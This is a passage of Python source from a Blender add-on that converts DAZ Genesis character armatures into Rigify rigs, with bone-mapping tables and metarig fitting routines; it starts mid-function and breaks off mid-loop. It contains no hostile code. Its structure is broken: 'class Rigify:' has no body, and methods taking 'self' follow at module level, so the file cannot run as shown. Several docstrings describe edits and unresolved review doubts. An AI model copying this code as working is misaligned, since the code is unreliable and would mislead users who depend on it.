        "forearm.R" : "rForeArm",
        "hand.R" : "rHand",
        "thumb.01.L" : "lThumb1",
        "thumb.02.L" : "lThumb2",
        "thumb.03.L" : "lThumb3",
        "f_index.01.L" : "lIndex1",
        "f_index.02.L" : "lIndex2",
        "f_index.03.L" : "lIndex3",
        "f_middle.01.L" : "lMid1",
        "f_middle.02.L" : "lMid2",
        "f_middle.03.L" : "lMid3",
        "f_ring.01.L" : "lRing1",
        "f_ring.02.L" : "lRing2",
        "f_ring.03.L" : "lRing3",
        "f_pinky.01.L" : "lPinky1",
        "f_pinky.02.L" : "lPinky2",
        "f_pinky.03.L" : "lPinky3",
        "thumb.01.R" : "rThumb1",
        "thumb.02.R" : "rThumb2",
        "thumb.03.R" : "rThumb3",
        "f_index.01.R" : "rIndex1",
        "f_index.02.R" : "rIndex2",
        "f_index.03.R" : "rIndex3",
        "f_middle.01.R" : "rMid1",
        "f_middle.02.R" : "rMid2",
        "f_middle.03.R" : "rMid3",
        "f_ring.01.R" : "rRing1",
        "f_ring.02.R" : "rRing2",
        "f_ring.03.R" : "rRing3",
        "f_pinky.01.R" : "rPinky1",
        "f_pinky.02.R" : "rPinky2",
        "f_pinky.03.R" : "rPinky3",
        "palm.01.L" : "lCarpal1",
        "palm.02.L" : "lCarpal2",
        "palm.03.L" : "lCarpal3",
        "palm.04.L" : "lCarpal4",
        "palm.01.R" : "rCarpal1",
        "palm.02.R" : "rCarpal2",
        "palm.03.R" : "rCarpal3",
        "palm.04.R" : "rCarpal4",
    }
    BreastBones = {
        "breast.L" : "lPectoral",
        "breast.R" : "rPectoral",
        #"breastDrv.L" : "lPectoralDrv",
        #"breastDrv.R" : "rPectoralDrv",
    }
    if meta.DazUseBreasts:
        RigifySkeleton = addDicts([RigifySkeleton, BreastBones])
    # Genesis 1/2 hands only have two carpal bones; map each palm to a
    # (head-bone, tail-bone) pair plus the vertex groups it owns.
    GenesisCarpals = {
        "palm.01.L" : (("lCarpal1", "lIndex1"), ["lCarpal1"]),
        "palm.02.L" : (("lCarpal1", "lMid1"), []),
        "palm.03.L" : (("lCarpal2", "lRing1"), ["lCarpal2"]),
        "palm.04.L" : (("lCarpal2", "lPinky1"), []),
        "palm.01.R" : (("rCarpal1", "rIndex1"), ["rCarpal1"]),
        "palm.02.R" : (("rCarpal1", "rMid1"), []),
        "palm.03.R" : (("rCarpal2", "rRing1"), ["rCarpal2"]),
        "palm.04.R" : (("rCarpal2", "rPinky1"), []),
    }
    # (daz bone, metarig bone, metarig parent) triples for the spine chain.
    GenesisSpine = [
        ("abdomen", spine, hips),
        ("abdomen2", spine1, spine),
        ("chest", chest, spine1),
        ("neck", neck, chest),
        ("head", head, neck),
    ]
    Genesis3Spine = [
        ("abdomen", spine, hips),
        ("abdomen2", spine1, spine),
        ("chest", chest, spine1),
        ("chestUpper", chest1, chest),
        ("neck", neck, chest1),
    ]
    if meta.DazUseSplitNeck:
        Genesis3Spine += [
            ("neckUpper", neck1, neck),
            ("head", head, neck1)]
    else:
        Genesis3Spine.append(("head", head, neck))
    # DAZ bones to merge into their "bend" counterpart.
    Genesis3Mergers = {
        "lShldrBend" : ["lShldrTwist"],
        "lForearmBend" : ["lForearmTwist"],
        "lThighBend" : ["lThighTwist"],
        "lFoot" : ["lMetatarsals"],
        "rShldrBend" : ["rShldrTwist"],
        "rForearmBend" : ["rForearmTwist"],
        "rThighBend" : ["rThighTwist"],
        "rFoot" : ["rMetatarsals"],
    }
    if not meta.DazUseSplitNeck:
        Genesis3Mergers["neckLower"] = ["neckUpper"]
    # Reparenting needed after the merges above.
    Genesis3Parents = {
        "neckLower" : "chestUpper",
        "chestUpper" : "chestLower",
        "chestLower" : "abdomenUpper",
        "abdomenUpper" : "abdomenLower",
        "lForearmBend" : "lShldrBend",
        "lHand" : "lForearmBend",
        "lShin" : "lThighBend",
        "lToe" : "lFoot",
        "rForearmBend" : "rShldrBend",
        "rHand" : "rForearmBend",
        "rShin" : "rThighBend",
        "rToe" : "rFoot",
    }
    if meta.DazUseSplitNeck:
        Genesis3Parents["head"] = "neckUpper"
        Genesis3Parents["neckUpper"] = "neckLower"
    else:
        Genesis3Parents["head"] = "neckLower"
    # Individual toe bones all reparent to the main toe bone.
    Genesis3Toes = {
        "lBigToe" : "lToe",
        "lSmallToe1" : "lToe",
        "lSmallToe2" : "lToe",
        "lSmallToe3" : "lToe",
        "lSmallToe4" : "lToe",
        "rBigToe" : "rToe",
        "rSmallToe1" : "rToe",
        "rSmallToe2" : "rToe",
        "rSmallToe3" : "rToe",
        "rSmallToe4" : "rToe",
    }
    # Genesis3/8 bone names -> legacy names used by RigifySkeleton.
    Genesis3Renames = {
        "abdomenLower" : "abdomen",
        "abdomenUpper" : "abdomen2",
        "chestLower" : "chest",
        "neckLower" : "neck",
        "lShldrBend" : "lShldr",
        "lForearmBend" : "lForeArm",
        "lThighBend" : "lThigh",
        "rShldrBend" : "rShldr",
        "rForearmBend" : "rForeArm",
        "rThighBend" : "rThigh",
    }
    return rigtype, hips, head
def deleteChildren(eb, meta):
    """
    Recursively remove every descendant edit-bone of *eb* from *meta*'s
    armature (post-order: deepest bones are removed first; *eb* itself
    is kept).

    Fix: iterate over a snapshot of ``eb.children`` — removing bones mutates
    the underlying bone collection, so iterating the live sequence while
    deleting risks skipped or stale entries.

    :param eb: edit bone whose subtree is to be deleted.
    :param meta: object owning ``data.edit_bones`` (the metarig).
    """
    for child in list(eb.children):
        deleteChildren(child, meta)
        meta.data.edit_bones.remove(child)
class DazBone:
    """
    Snapshot of one armature bone: edit-mode geometry captured at
    construction, plus pose-mode settings captured via getPose() and
    restored via setPose().
    """

    def __init__(self, eb):
        from .fix import ConstraintStore
        self.name = eb.name
        self.head = eb.head.copy()
        self.tail = eb.tail.copy()
        self.roll = eb.roll
        # Remember only the parent's name, not the bone object itself.
        self.parent = eb.parent.name if eb.parent else None
        self.use_deform = eb.use_deform
        self.rotation_mode = None
        self.store = ConstraintStore()

    def getPose(self, pb):
        """Record pose-mode settings and constraints of pose bone *pb*."""
        self.rotation_mode = pb.rotation_mode
        self.lock_location = pb.lock_location
        self.lock_rotation = pb.lock_rotation
        self.lock_scale = pb.lock_scale
        self.store.storeConstraints(pb.name, pb)

    def setPose(self, pb):
        """Reapply the recorded pose-mode settings and constraints to *pb*."""
        pb.rotation_mode = self.rotation_mode
        pb.lock_location = self.lock_location
        pb.lock_rotation = self.lock_rotation
        pb.lock_scale = self.lock_scale
        self.store.restoreConstraints(pb.name, pb)
def addDicts(structs):
    """Merge a sequence of dicts into a new dict; on duplicate keys the
    entry from the later dict wins."""
    merged = {}
    for struct in structs:
        merged.update(struct)
    return merged
class Rigify:
def setupDazSkeleton(self, meta):
    """
    Build the bone-name mapping tables for *meta*'s DAZ rig type.

    Fix: the method previously mutated the module-global RigifySkeleton
    dict when adding the genesis1/2 extra spine entries, so those entries
    leaked into any later conversion of a genesis3/8 rig. A shallow copy
    is taken before mutating.

    :param meta: metarig carrying DazRigifyType (validated by the caller).
    :return: (rigifySkel, spineBones, dazskel) where rigifySkel maps
        rigify -> DAZ names, spineBones is the spine triple list, and
        dazskel is the inverted DAZ -> rigify mapping (string entries only).
    """
    # Copy so per-rig additions do not contaminate the shared global table.
    rigifySkel = dict(RigifySkeleton)
    if meta.DazRigifyType in ["genesis1", "genesis2"]:
        rigifySkel["chestUpper"] = "chestUpper"
        rigifySkel["abdomen2"] = "abdomen2"
        # NOTE(review): Genesis3Spine (not GenesisSpine) is used for
        # genesis1/2 as well — preserved as-is; confirm intent.
        spineBones = Genesis3Spine
    elif meta.DazRigifyType in ["genesis3", "genesis8"]:
        spineBones = Genesis3Spine
    dazskel = {}
    for rbone, dbone in rigifySkel.items():
        if isinstance(dbone, tuple):
            dbone = dbone[0]
        # Non-string entries (nested tuples) are deliberately skipped.
        if isinstance(dbone, str):
            dazskel[dbone] = rbone
    return rigifySkel, spineBones, dazskel
def renameBones(self, rig, bones):
    """
    Rename edit-bones of *rig* according to the {old_name: new_name}
    mapping *bones*; raises DazError if any old name is missing.
    Leaves the object in OBJECT mode.
    """
    bpy.ops.object.mode_set(mode='EDIT')
    for dname,rname in bones.items():
        if dname in rig.data.edit_bones.keys():
            eb = rig.data.edit_bones[dname]
            eb.name = rname
        else:
            raise DazError("Did not find bone %s " % dname)
    bpy.ops.object.mode_set(mode='OBJECT')
def reparentBones(self, rig, parents):
    """
    Reparent edit-bones of *rig* per the {bone: new_parent} mapping
    *parents*, disconnecting each bone from its old parent first.
    Pairs where either bone is missing are silently skipped.
    """
    bpy.ops.object.mode_set(mode='EDIT')
    for bname,pname in parents.items():
        if (pname in rig.data.edit_bones.keys() and
            bname in rig.data.edit_bones.keys()):
            eb = rig.data.edit_bones[bname]
            parb = rig.data.edit_bones[pname]
            eb.use_connect = False
            eb.parent = parb
    bpy.ops.object.mode_set(mode='OBJECT')
def setupExtras(self, rig, rigifySkel, spineBones):
    """
    Collect "extra" bones: bones of *rig* that carry vertex-group weights
    on some child mesh but have no counterpart in the spine or skeleton
    tables, plus their ancestors up to the first covered bone (so the
    extra chains stay connected).

    :return: OrderedDict mapping bone name -> bone name.
    """
    extras = OrderedDict()
    taken = []
    for dbone,_rbone,_pbone in spineBones:
        taken.append(dbone)
    for _rbone, dbone in rigifySkel.items():
        if isinstance(dbone, tuple):
            dbone = dbone[0]
        # unwrap a second time: carpal entries are ((head, tail), vgroups),
        # so the first unwrap can still yield a tuple.
        if isinstance(dbone, tuple):
            dbone = dbone[0]
        taken.append(dbone)
    for ob in rig.children:
        for vgrp in ob.vertex_groups:
            if (vgrp.name not in taken and
                vgrp.name in rig.data.bones.keys()):
                extras[vgrp.name] = vgrp.name
    # walk up from each extra bone, adding uncovered ancestors
    for dbone in list(extras.keys()):
        bone = rig.data.bones[dbone]
        while bone.parent:
            pname = bone.parent.name
            if pname in extras.keys() or pname in taken:
                break
            extras[pname] = pname
            bone = bone.parent
    return extras
def splitBone(self, rig, bname, upname):
    """
    Split the edit-bone *bname* of *rig* at its midpoint: the original bone
    keeps the lower half, and a new bone *upname* (parented to it, same
    roll) takes the upper half and adopts the original bone's children.
    No-op if *upname* already exists.
    """
    if upname in rig.data.bones.keys():
        return
    bpy.ops.object.mode_set(mode='EDIT')
    eblow = rig.data.edit_bones[bname]
    vec = eblow.tail - eblow.head
    mid = eblow.head + vec/2
    ebup = rig.data.edit_bones.new(upname)
    # move the original bone's children onto the new upper half
    for eb in eblow.children:
        eb.parent = ebup
    ebup.head = mid
    ebup.tail = eblow.tail
    ebup.parent = eblow
    ebup.roll = eblow.roll
    eblow.tail = mid
    bpy.ops.object.mode_set(mode='OBJECT')
def splitNeck(self, meta):
    """
    Subdivide the metarig's "spine.003" bone and renumber the whole spine
    chain so the extra segment yields spine.001 ... spine.00N
    (making room for a split neck).
    """
    bpy.ops.object.mode_set(mode='EDIT')
    spine = meta.data.edit_bones["spine"]
    spine3 = meta.data.edit_bones["spine.003"]
    bonelist={}
    bpy.ops.armature.select_all(action='DESELECT')
    spine3.select = True
    bpy.ops.armature.subdivide()
    spinebones = spine.children_recursive_basename
    chainlength = len(spinebones)
    # two rename passes: first to temporary names ("spine.0", "spine.1", ...)
    # so the final ".00N" names never collide with existing bones.
    for x in range(chainlength):
        y = str(x)
        spinebones[x].name = "spine" + "." + y
    for x in range(chainlength):
        y = str(x+1)
        spinebones[x].name = "spine" + ".00" + y
    bpy.ops.armature.select_all(action='DESELECT')
    bpy.ops.object.mode_set(mode='OBJECT')
def deleteIfNotExist(self, bnames, rig, meta, context):
    """
    For each (daz_name, meta_name) pair in *bnames*, remove the metarig
    bone *meta_name* when the DAZ rig has no bone *daz_name* (e.g. drop
    breast bones for figures without pectoral bones). Restores *rig* as
    the active object afterwards.
    """
    setActiveObject(context, meta)
    bpy.ops.object.mode_set(mode='EDIT')
    for dname,mname in bnames:
        if (dname not in rig.data.bones.keys() and
            mname in meta.data.edit_bones.keys()):
            eb = meta.data.edit_bones[mname]
            meta.data.edit_bones.remove(eb)
    bpy.ops.object.mode_set(mode='OBJECT')
    setActiveObject(context, rig)
def checkRigifyEnabled(self, context):
    """Return True when the Rigify add-on is enabled in the user preferences."""
    return any(addon.module == "rigify"
               for addon in context.user_preferences.addons)
def getRigifyBone(self, bname, dazSkel, extras, spineBones):
    """
    Translate a DAZ bone name into the corresponding rigify (usually DEF-)
    bone name, trying in order: the deform-bone table, the side-prefixed
    deform table ("lShldrBend" -> DeformBones["ShldrBend"] % "L"), the
    DAZ->rigify skeleton mapping, the extras table, and finally the spine
    triples. Prints "MISS" and returns None when nothing matches.
    """
    global DeformBones
    # Direct hit in the deform table.
    if bname in DeformBones:
        return DeformBones[bname]
    # Hit after stripping the side prefix; the prefix fills the %s slot.
    if bname[1:] in DeformBones:
        return DeformBones[bname[1:]] % bname[0].upper()
    # Skeleton mapping, optionally redirected through MetaBones.
    if bname in dazSkel:
        rname = dazSkel[bname]
        return "DEF-" + MetaBones.get(rname, rname)
    # Extra (unmapped but weighted) bones keep their own name.
    if bname in extras:
        return extras[bname]
    # Spine chain lookup.
    for dname, rname, _pname in spineBones:
        if dname == bname:
            return "DEF-" + rname
    print("MISS", bname)
    return None
def getDazBones(self, rig):
    """
    Snapshot every bone of *rig* as a DazBone: edit-mode geometry first,
    then pose-mode settings/constraints. Leaves the object in OBJECT mode.

    :return: OrderedDict mapping bone name -> DazBone.
    """
    # Setup info about DAZ bones
    dazBones = OrderedDict()
    bpy.ops.object.mode_set(mode='EDIT')
    for eb in rig.data.edit_bones:
        dazBones[eb.name] = DazBone(eb)
    bpy.ops.object.mode_set(mode='POSE')
    for pb in rig.pose.bones:
        dazBones[pb.name].getPose(pb)
    bpy.ops.object.mode_set(mode='OBJECT')
    return dazBones
def createMeta(self, context):
    """Create a Rigify metarig fitted to the active DAZ armature.

    Adds a muted COPY_SCALE constraint named "Rigify Source" on the metarig
    pointing back at the DAZ rig (used later by rigifyMeta to find it),
    classifies the rig generation, fits every metarig bone to its DAZ
    counterpart, fixes the spine chain, and configures rigify bone types.

    Returns the metarig object. Raises DazError for non-armatures, missing
    Rigify add-on, or unsupported rig generations.

    Fixes vs. original: the armature check now runs before any attribute
    access (it previously read rig.DazScale first, and formatted the error
    with the undefined name `ob`, raising NameError/AttributeError instead
    of DazError), and a dead `hip.tail = Vector((1,2,3))` store that was
    immediately overwritten has been removed.
    """
    from collections import OrderedDict
    from .mhx import connectToParent, unhideAllObjects
    from .figure import getRigType
    from .merge import mergeBonesAndVgroups

    print("Create metarig")
    rig = context.object
    # Validate before touching rig attributes (bug fix: was `% ob`).
    if not(rig and rig.type == 'ARMATURE'):
        raise DazError("Rigify: %s is neither an armature nor has armature parent" % rig)
    scale = rig.DazScale
    scn = context.scene
    unhideAllObjects(context, rig)

    # Create metarig
    bpy.ops.object.mode_set(mode='OBJECT')
    try:
        bpy.ops.object.armature_human_metarig_add()
    except AttributeError:
        # The operator only exists when the Rigify add-on is enabled.
        raise DazError("The Rigify add-on is not enabled. It is found under rigging.")
    bpy.ops.object.location_clear()
    bpy.ops.object.rotation_clear()
    bpy.ops.object.scale_clear()
    bpy.ops.transform.resize(value=(100*scale, 100*scale, 100*scale))
    bpy.ops.object.transform_apply(location=False, rotation=False, scale=True)

    meta = context.object
    # Muted constraint used only as a back-pointer to the source rig.
    cns = meta.constraints.new('COPY_SCALE')
    cns.name = "Rigify Source"
    cns.target = rig
    cns.mute = True

    # Classify the metarig/rig generation.
    meta.DazPre278 = ("hips" in meta.data.bones.keys())
    meta.DazRigifyType = getRigType(rig)
    meta.DazUseBreasts = (not meta.DazPre278 and rig.data.DazExtraDrivenBones)
    meta.DazUseSplitNeck = (not meta.DazPre278 and meta.DazRigifyType in ["genesis3", "genesis8"])
    if meta.DazUseSplitNeck:
        self.splitNeck(meta)
    meta.DazRigType, hips, head = setupTables(meta)

    activateObject(context, rig)
    setSelected(rig, True)
    bpy.ops.object.transform_apply(location=True, rotation=True, scale=True)
    if meta.DazRigifyType in ["genesis1", "genesis2"]:
        self.fixPelvis(rig)
        self.fixCarpals(rig)
        self.splitBone(rig, "chest", "chestUpper")
        self.splitBone(rig, "abdomen", "abdomen2")
        delbones = [
            ("lPectoral", "breast.L"),
            ("rPectoral", "breast.R"),
        ]
        self.deleteIfNotExist(delbones, rig, meta, context)
    elif meta.DazRigifyType in ["genesis3", "genesis8"]:
        mergeBonesAndVgroups(rig, Genesis3Mergers, Genesis3Parents, context)
        self.reparentBones(rig, Genesis3Toes)
        self.renameBones(rig, Genesis3Renames)
    else:
        activateObject(context, meta)
        deleteObject(context, meta)
        raise DazError("Cannot rigify %s %s" % (meta.DazRigifyType, rig.name))
    connectToParent(rig)
    rigifySkel, spineBones, dazSkel = self.setupDazSkeleton(meta)
    dazBones = self.getDazBones(rig)

    # Fit metarig to default DAZ rig
    setActiveObject(context, meta)
    setSelected(meta, True)
    bpy.ops.object.mode_set(mode='EDIT')
    # Disconnect everything first so heads/tails can be moved freely.
    for eb in meta.data.edit_bones:
        eb.use_connect = False
    for eb in meta.data.edit_bones:
        try:
            dname = rigifySkel[eb.name]
        except KeyError:
            dname = None
        if isinstance(dname, tuple):
            dname, _vgrps = dname
        if isinstance(dname, str):
            if dname in dazBones.keys():
                dbone = dazBones[dname]
                eb.head = dbone.head
                eb.tail = dbone.tail
                eb.roll = dbone.roll
        elif isinstance(dname, tuple):
            # Span between two DAZ bones: head of the first to head of the second.
            if (dname[0] in dazBones.keys() and
                dname[1] in dazBones.keys()):
                dbone1 = dazBones[dname[0]]
                dbone2 = dazBones[dname[1]]
                eb.head = dbone1.head
                eb.tail = dbone2.head

    # The metarig hip points the opposite way from the DAZ hip.
    # (Removed a dead `hip.tail = Vector((1,2,3))` store here; it was
    # immediately overwritten by the two assignments below.)
    hip = meta.data.edit_bones[hips]
    dbone = dazBones["hip"]
    hip.head = dbone.tail
    hip.tail = dbone.head
    if meta.DazRigifyType in ["genesis3", "genesis8"]:
        eb = meta.data.edit_bones[head]
        # NOTE(review): factor 1.0 makes this a no-op; presumably a tweakable
        # head-length scale — confirm the intended factor.
        eb.tail = eb.head + 1.0*(eb.tail - eb.head)

    self.fixHands(meta)
    for suffix in [".L", ".R"]:
        shoulder = meta.data.edit_bones["shoulder"+suffix]
        upperarm = meta.data.edit_bones["upper_arm"+suffix]
        shin = meta.data.edit_bones["shin"+suffix]
        foot = meta.data.edit_bones["foot"+suffix]
        toe = meta.data.edit_bones["toe"+suffix]
        # Keep a small gap between shoulder tail and upper arm head.
        vec = shoulder.tail - shoulder.head
        if (upperarm.head - shoulder.tail).length < 0.02*vec.length:
            shoulder.tail -= 0.02*vec
        if "pelvis"+suffix in meta.data.edit_bones.keys():
            thigh = meta.data.edit_bones["thigh"+suffix]
            pelvis = meta.data.edit_bones["pelvis"+suffix]
            pelvis.head = hip.head
            pelvis.tail = thigh.head
        #if "breast"+suffix in meta.data.edit_bones.keys():
        #    breast = meta.data.edit_bones["breast"+suffix]
        #    breast.head[0] = breast.tail[0]
        #    breast.head[2] = breast.tail[2]
        foot.head = shin.tail
        toe.head = foot.tail
        # Construct heel and heel.02 from foot/toe geometry.
        xa, ya, za = foot.head
        xb, yb, zb = toe.head
        heelhead = foot.head
        heeltail = Vector((xa, yb-1.3*(yb-ya), zb))
        mid = (toe.head + heeltail)/2
        r = Vector((yb-ya, 0, 0))
        if xa > 0:
            fac = 0.3
        else:
            fac = -0.3
        heel02head = mid + fac*r
        heel02tail = mid - fac*r
        if "heel"+suffix in meta.data.edit_bones.keys():
            heel = meta.data.edit_bones["heel"+suffix]
            heel.head = heelhead
            heel.tail = heeltail
        if "heel.02"+suffix in meta.data.edit_bones.keys():
            heel02 = meta.data.edit_bones["heel.02"+suffix]
            heel02.head = heel02head
            heel02.tail = heel02tail

    # Reconnect bones whose head now coincides with the parent tail.
    for eb in meta.data.edit_bones:
        if (eb.parent and
            eb.head == eb.parent.tail and
            eb.name not in MetaDisconnect):
            eb.use_connect = True

    # Fix spine
    mbones = meta.data.edit_bones
    for dname, rname, pname in spineBones:
        if dname not in dazBones.keys():
            continue
        dbone = dazBones[dname]
        if rname in mbones.keys():
            eb = mbones[rname]
        else:
            eb = mbones.new(dname)
            eb.name = rname
        # Disconnect while repositioning, then reconnect to the parent.
        eb.use_connect = False
        eb.head = dbone.head
        eb.tail = dbone.tail
        eb.roll = dbone.roll
        eb.parent = mbones[pname]
        eb.use_connect = True
        eb.layers = list(eb.parent.layers)

    self.reparentBones(meta, MetaParents)

    # Add rigify properties to spine bones
    bpy.ops.object.mode_set(mode='OBJECT')
    disconnect = []
    connect = []
    for pb in meta.pose.bones:
        if "rigify_type" in pb.keys():
            if pb["rigify_type"] == "":
                pass
            elif pb["rigify_type"] == "spines.super_head":
                disconnect.append(pb.name)
            elif pb["rigify_type"] == "limbs.super_finger":
                connect += self.getChildren(pb)
                pb.rigify_parameters.primary_rotation_axis = 'X'
            elif pb["rigify_type"] == "limbs.super_limb":
                pb.rigify_parameters.rotation_axis = 'x'
                pb.rigify_parameters.auto_align_extremity = self.useAutoAlign
            elif pb["rigify_type"] in [
                    "spines.super_spine",
                    "spines.basic_spine",
                    "basic.super_copy",
                    "limbs.super_palm",
                    "limbs.simple_tentacle"]:
                pass
            else:
                # Unknown rigify type: leave untouched but report it.
                print("RIGIFYTYPE %s: %s" % (pb.name, pb["rigify_type"]))
    for rname, prop, value in RigifyParams:
        if rname in meta.pose.bones:
            pb = meta.pose.bones[rname]
            setattr(pb.rigify_parameters, prop, value)

    # Disconnect bones that have to be disconnected
    bpy.ops.object.mode_set(mode='EDIT')
    for rname in disconnect:
        eb = meta.data.edit_bones[rname]
        eb.use_connect = False
    for rname in connect:
        eb = meta.data.edit_bones[rname]
        eb.use_connect = True

    bpy.ops.object.mode_set(mode='OBJECT')
    print("Metarig created")
    return meta
def rigifyMeta(self, context, deleteMeta):
    """Run rigify generation on the active metarig and transfer everything
    from the original DAZ rig to the generated rig.

    Finds the source rig through the "Rigify Source" constraint created by
    createMeta, generates the rigify rig, adds the DAZ-only extra bones,
    renames/splits vertex groups, retargets drivers, modifiers and bone
    parents, then deletes the DAZ rig (and optionally the metarig).

    Returns the generated rig. Raises DazError when the source rig is gone
    or generation fails.

    Fixes vs. original: the bare `except:` around rigify_generate no longer
    swallows KeyboardInterrupt/SystemExit, and a duplicated (dead)
    membership test in the driver-copying loop was removed.
    """
    from .driver import getBoneDrivers, copyDriver, changeBoneTarget, changeDriverTarget
    from .node import setParent, clearParent
    from .daz import copyPropGroups
    from .mhx import unhideAllObjects
    from .figure import copyBoneInfo

    print("Rigify metarig")
    meta = context.object
    # Locate the source rig via the back-pointer constraint.
    rig = None
    for cns in meta.constraints:
        if cns.type == 'COPY_SCALE' and cns.name == "Rigify Source":
            rig = cns.target
    if rig is None:
        raise DazError("Original rig not found")
    unhideAllObjects(context, rig)
    if not inSceneLayer(context, rig):
        showSceneLayer(context, rig)

    bpy.ops.object.mode_set(mode='POSE')
    # Keep the rolls we fitted in createMeta; rigify must not re-align them.
    for pb in meta.pose.bones:
        if (hasattr(pb, "rigify_parameters") and
            hasattr(pb.rigify_parameters, "roll_alignment")):
            pb.rigify_parameters.roll_alignment = "manual"

    try:
        bpy.ops.pose.rigify_generate()
    except Exception:
        raise DazError("Cannot rigify %s rig %s " % (meta.DazRigifyType, rig.name))
    scn = context.scene
    gen = context.object
    coll = getCollection(context)

    print("Fix generated rig", gen.name)
    setActiveObject(context, rig)
    rigifySkel, spineBones, dazSkel = self.setupDazSkeleton(meta)
    dazBones = self.getDazBones(rig)

    # Parent all rigify widget objects under one empty to keep things tidy.
    empty = bpy.data.objects.new("Widgets", None)
    coll.objects.link(empty)
    empty.parent = gen
    for ob in getSceneObjects(context):
        if ob.parent is None and ob.name.startswith("WGT-"):
            ob.parent = empty

    extras = self.setupExtras(rig, rigifySkel, spineBones)
    if meta.DazUseBreasts:
        for prefix in ["l", "r"]:
            extras[prefix+"PectoralDrv"] = prefix+"PectoralDrv"
    # Remember which DAZ bones were driven, so their drivers can be copied.
    driven = {}
    for pb in rig.pose.bones:
        fcus = getBoneDrivers(rig, pb)
        if fcus:
            driven[pb.name] = fcus

    # Add extra bones to generated rig
    faceLayers = R_FACE*[False] + [True] + (31-R_FACE)*[False]
    helpLayers = R_HELP*[False] + [True] + (31-R_HELP)*[False]
    setActiveObject(context, gen)
    bpy.ops.object.mode_set(mode='EDIT')
    for dname, rname in extras.items():
        if dname not in dazBones.keys():
            continue
        dbone = dazBones[dname]
        eb = gen.data.edit_bones.new(rname)
        eb.head = dbone.head
        eb.tail = dbone.tail
        eb.roll = dbone.roll
        eb.use_deform = dbone.use_deform
        if eb.use_deform:
            eb.layers = faceLayers
            eb.layers[R_DEFORM] = True
        else:
            eb.layers = helpLayers
        # Driven bones go to the help layer regardless of deform status.
        if dname in driven.keys():
            eb.layers = helpLayers

    # Add parents to extra bones
    for dname, rname in extras.items():
        if dname not in dazBones.keys():
            continue
        dbone = dazBones[dname]
        eb = gen.data.edit_bones[rname]
        if dbone.parent:
            pname = self.getRigifyBone(dbone.parent, dazSkel, extras, spineBones)
            if (pname in gen.data.edit_bones.keys()):
                eb.parent = gen.data.edit_bones[pname]
                eb.use_connect = (eb.parent is not None and eb.parent.tail == eb.head)
            else:
                print("No parent", dbone.name, dbone.parent, pname)
                bones = list(dazSkel.keys())
                bones.sort()
                print("Bones:", bones)
                msg = ("Bone %s has no parent %s" % (dbone.name, dbone.parent))
                raise DazError(msg)

    if meta.DazUseBreasts:
        # Insert the pectoral driver bones between breast bones and parents.
        for prefix, suffix in [("l", ".L"), ("r", ".R")]:
            db = gen.data.edit_bones[prefix + "PectoralDrv"]
            eb = gen.data.edit_bones["breast" + suffix]
            db.parent = eb.parent
            eb.parent = db

    bpy.ops.object.mode_set(mode='POSE')
    # Lock extras
    for dname, rname in extras.items():
        if dname not in dazBones.keys():
            continue
        if rname in gen.pose.bones.keys():
            pb = gen.pose.bones[rname]
            dazBones[dname].setPose(pb)

    # Remove breast custom shapes, because they are placed differently in Daz
    for rname in ["breast.L", "breast.R"]:
        if rname in gen.pose.bones.keys():
            pb = gen.pose.bones[rname]
            pb.custom_shape = None

    # Rescale custom shapes
    if meta.DazRigifyType in ["genesis3", "genesis8"]:
        self.fixCustomShape(gen, ["head", "spine_fk.007"], 4)
    if bpy.app.version >= (2,82,0):
        self.fixCustomShape(gen, ["chest"], 1, Vector((0,-100*rig.DazScale,0)))

    # Add DAZ properties
    for key in rig.keys():
        self.copyProp(key, rig, gen)
    for key in rig.data.keys():
        self.copyProp(key, rig.data, gen.data)

    # Copy per-bone info; for split limbs the info goes onto the fk bone.
    for bname, dname in rigifySkel.items():
        if dname in rig.data.bones.keys():
            bone = rig.data.bones[dname]
            if bname in gen.data.bones.keys():
                rbone = gen.data.bones[bname]
                copyBoneInfo(bone, rbone)
            else:
                words = bname.split(".")
                if len(words) == 2:
                    gname, suffix = words
                    if gname+"_fk."+suffix in gen.data.bones.keys():
                        fkbone = gen.data.bones[gname+"_fk."+suffix]
                    elif gname+".fk."+suffix in gen.data.bones.keys():
                        fkbone = gen.data.bones[gname+".fk."+suffix]
                    else:
                        fkbone = None
                    if fkbone:
                        copyBoneInfo(bone, fkbone)

    # Handle bone parents
    boneParents = []
    for ob in rig.children:
        if ob.parent_type == 'BONE':
            boneParents.append((ob, ob.parent_bone))
            clearParent(ob)
    for ob, dname in boneParents:
        rname = self.getRigifyBone(dname, dazSkel, extras, spineBones)
        if rname and rname in gen.data.bones.keys():
            print("Parent %s to bone %s" % (ob.name, rname))
            bone = gen.data.bones[rname]
            setParent(context, ob, gen, bone.name)
        else:
            print("Did not find bone parent %s %s" % (dname, rname))
            setParent(context, ob, gen, None)

    # Copy DAZ morph drivers and change armature modifier
    activateObject(context, gen)
    for ob in rig.children:
        if ob.type == 'MESH':
            ob.parent = gen

            # Rename spine vertex groups to their DEF- counterparts.
            for dname, rname, _pname in spineBones:
                if dname in ob.vertex_groups.keys():
                    vgrp = ob.vertex_groups[dname]
                    vgrp.name = "DEF-" + rname

            for rname, dname in rigifySkel.items():
                if dname[1:] in ["Thigh", "Shin", "Shldr", "ForeArm"]:
                    self.rigifySplitGroup(rname, dname, ob, rig, True, meta)
                elif (meta.DazPre278 and
                      dname[1:] in ["Thumb1", "Index1", "Mid1", "Ring1", "Pinky1"]):
                    self.rigifySplitGroup(rname, dname, ob, rig, False, meta)
                elif isinstance(dname, str):
                    if dname in ob.vertex_groups.keys():
                        vgrp = ob.vertex_groups[dname]
                        vgrp.name = "DEF-" + rname
                else:
                    self.mergeVertexGroups(rname, dname[1], ob)

            for dname, rname in extras.items():
                if dname in ob.vertex_groups.keys():
                    vgrp = ob.vertex_groups[dname]
                    vgrp.name = rname

            # Retarget object-, data- and shapekey-level drivers.
            if ob.animation_data:
                for fcu in ob.animation_data.drivers:
                    changeDriverTarget(fcu, gen)
            if ob.data.animation_data:
                for fcu in ob.data.animation_data.drivers:
                    changeDriverTarget(fcu, gen)
            if ob.data.shape_keys and ob.data.shape_keys.animation_data:
                for fcu in ob.data.shape_keys.animation_data.drivers:
                    changeDriverTarget(fcu, gen)
            for mod in ob.modifiers:
                if mod.type == 'ARMATURE' and mod.object == rig:
                    mod.object = gen

    # Add generated rig to group (groups only exist before Blender 2.80)
    group = None
    if bpy.app.version <= (2,80,0):
        for grp in bpy.data.groups:
            if rig.name in grp.objects:
                group = grp
                break
        print("Group: %s" % group)
        if group:
            group.objects.link(gen)

    # Fix drivers
    assoc = [(rigi, daz) for (daz, rigi, _) in Genesis3Spine]
    assoc += [(rigi, daz) for (rigi, daz) in RigifySkeleton.items()]
    for bname, fcus in driven.items():
